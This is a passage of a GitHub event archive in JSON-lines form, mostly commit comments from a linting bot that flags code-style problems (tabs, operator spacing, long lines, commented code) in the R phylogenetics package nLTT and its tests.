^~\n```\n[R/ABC_SMC.R:347:36:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L347) *style:* **Put spaces around all infix operators.**\n```r\n​\t          new_pp - pp + hr > log(stats::runif(1, 0, 1)) ) {\n                                  ~^~\n```\n[R/ABC_SMC.R:348:22:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/R/ABC_SMC.R#L348) *style:* **Put spaces around all infix operators.**\n```r\n​\t          pp <- new_pp\n                    ~^~~\n```\n[tests/testthat/test_calculate_weight.R:2:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tweights <- rep(1, 2);\n^\n```\n[tests/testthat/test_calculate_weight.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tparticles <- list();\n^\n```\n[tests/testthat/test_calculate_weight.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:2) {\n^\n```\n[tests/testthat/test_calculate_weight.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tparticles[[i]] <- c(10, 10)\n^~\n```\n[tests/testthat/test_calculate_weight.R:5:17:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L5) *style:* **Put spaces around all infix operators.**\n```r\n​\tweights <- rep(1, 2);\n               ~^\n```\n[tests/testthat/test_calculate_weight.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[tests/testthat/test_calculate_weight.R:6:19:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L6) *style:* **Put spaces around all infix operators.**\n```r\n​\tparticles <- list();\n                 ~^~~\n```\n[tests/testthat/test_calculate_weight.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tsigma <- 1;\n^\n```\n[tests/testthat/test_calculate_weight.R:7:12:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L7) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:2) {\n           ^\n```\n[tests/testthat/test_calculate_weight.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tprior_density_function <- function(x) {\n^\n```\n[tests/testthat/test_calculate_weight.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[1], min=0, max=1000) *\n^~\n```\n[tests/testthat/test_calculate_weight.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n^~\n```\n[tests/testthat/test_calculate_weight.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:11:32:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\tprior_density_function <- function(x) {\n                              ~^~~\n```\n[tests/testthat/test_calculate_weight.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:13:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~\n```\n[tests/testthat/test_calculate_weight.R:13:46:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L13) *style:* **Closing curly-braces should always be on their own line, unless it's followed by an else.**\n```r\n​\t\tdunif(x[2], min=0, max=1000) }\n                                             ^\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~\n```\n[tests/testthat/test_calculate_weight.R:14:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L14) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:15:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:16:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L16) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:16:61:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:16:90:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L16) *style:* **Commented code should be removed.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), #log(5) - log(10) == -1 * (log(20) - log(10))\n                                                                                         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:17:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L17) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:17:61:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L17) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(20, 20), sigma, prior_density_function), #so these should be equal, because jumping densities are symmetric (dnorm)\n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:18:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\texpect_equal(\n^\n```\n[tests/testthat/test_calculate_weight.R:19:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~\n```\n[tests/testthat/test_calculate_weight.R:20:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L20) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:21:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ttolerance = 0.0001\n^~\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t)\n^\n```\n[tests/testthat/test_calculate_weight.R:22:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L22) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:22:61:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                           ~^~\n```\n[tests/testthat/test_calculate_weight.R:22:88:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L22) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5, 5), sigma, prior_density_function), \n                                                                                       ^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:23:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L23) *style:* **lines should not be more than 80 characters.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_calculate_weight.R:23:61:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L23) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tcalculate_weight(weights, particles, current=c(5.0, 5.0), sigma, prior_density_function),\n                                                            ^~\n```\n[tests/testthat/test_calculate_weight.R:24:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:26:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L26) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_calculate_weight.R:27:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_calculate_weight.R#L27) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[tests/testthat/test_mcmc_nltt.R:3:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tset.seed(1) #just to be safe\n^\n```\n[tests/testthat/test_mcmc_nltt.R:4:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:5:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:6:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tLL_BD <- function(params, phy) {\n^\n```\n[tests/testthat/test_mcmc_nltt.R:7:11:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:7:35:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:43:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:50:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:61:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:7:68:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\tp <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tLL_BD <- function(params, phy) {\n^\n```\n[tests/testthat/test_mcmc_nltt.R:8:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:11:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n         ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:8:35:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                 ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:43:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                         ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:50:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:61:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                           ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:8:68:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tq <- TESS::tess.sim.taxa(n=1,nTaxa=50,max=100,lambda=1.0,mu=0.0)[[1]]\n                                                                  ~^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n^~\n```\n[tests/testthat/test_mcmc_nltt.R:9:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:9:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n  ^~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:10:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:10:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \t\t\t\t\t\t\t  samplingProbability = 1, log = TRUE)\n  ^~~~~~~\n```\n[tests/testthat/test_mcmc_nltt.R:10:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:10:15:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tLL_BD <- function(params, phy) {\n             ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:11:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:11:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior1 <- dunif( params[1], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:11:3:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n  ^\n```\n[tests/testthat/test_mcmc_nltt.R:11:21:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                   ~^~~\n```\n[tests/testthat/test_mcmc_nltt.R:11:63:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tlnl <- TESS::tess.likelihood(phy[[1]], lambda = params[1], mu = params[2],\n                                                             ~^\n```\n[tests/testthat/test_mcmc_nltt.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \tprior2 <- dunif( params[2], 0, 100, log = TRUE)\n^\n```\n[tests/testthat/test_mcmc_nltt.R:12:1:](https://github.com/richelbilderbeek/nLTT/blob/9b4c2cbe54997ef29e493eef0586a4d32d5b122c/tests/testthat/test_mcmc_nltt.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t \treturn(lnl + prior1 + prior2)\n^\n```\n"}},"created_at":"2016-09-14T11:24:51Z"}
{"id":"4561356459","type":"CommitCommentEvent","actor":{"login":"wuhou123"},"repo":{"name":"wuhou123/make"},"payload":{"comment":{"id":19017231,"position":null,"line":null,"path":null,"commit_id":"3aa516f1d7cfba84cf4330c963591469b665fe59","created_at":"2016-09-14T11:25:01Z","updated_at":"2016-09-14T11:25:01Z","body":"text"}},"created_at":"2016-09-14T11:25:01Z"}
{"id":"4561358949","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/nLTT"},"payload":{"comment":{"id":19017237,"position":null,"line":null,"path":null,"commit_id":"13537edf1eeda33ba34b7140465f37506073b09b","created_at":"2016-09-14T11:25:39Z","updated_at":"2016-09-14T11:25:39Z","body":"[inst/doc/trees_with_root_edge.R:1:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L1) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:6:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L6) *style:* **Commented code should be removed.**\n```r\n​## ------------------------------------------------------------------------\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/doc/trees_with_root_edge.R:10:2:](https://github.com/richelbilderbeek/nLTT/blob/13537edf1eeda33ba34b7140465f37506073b09b/inst/doc/trees_with_root_edge.R#L10) *style:* **Commented code should be removed.**\n```r\n​## ----fig.width = 3, fig.height = 3---------------------------------------\n 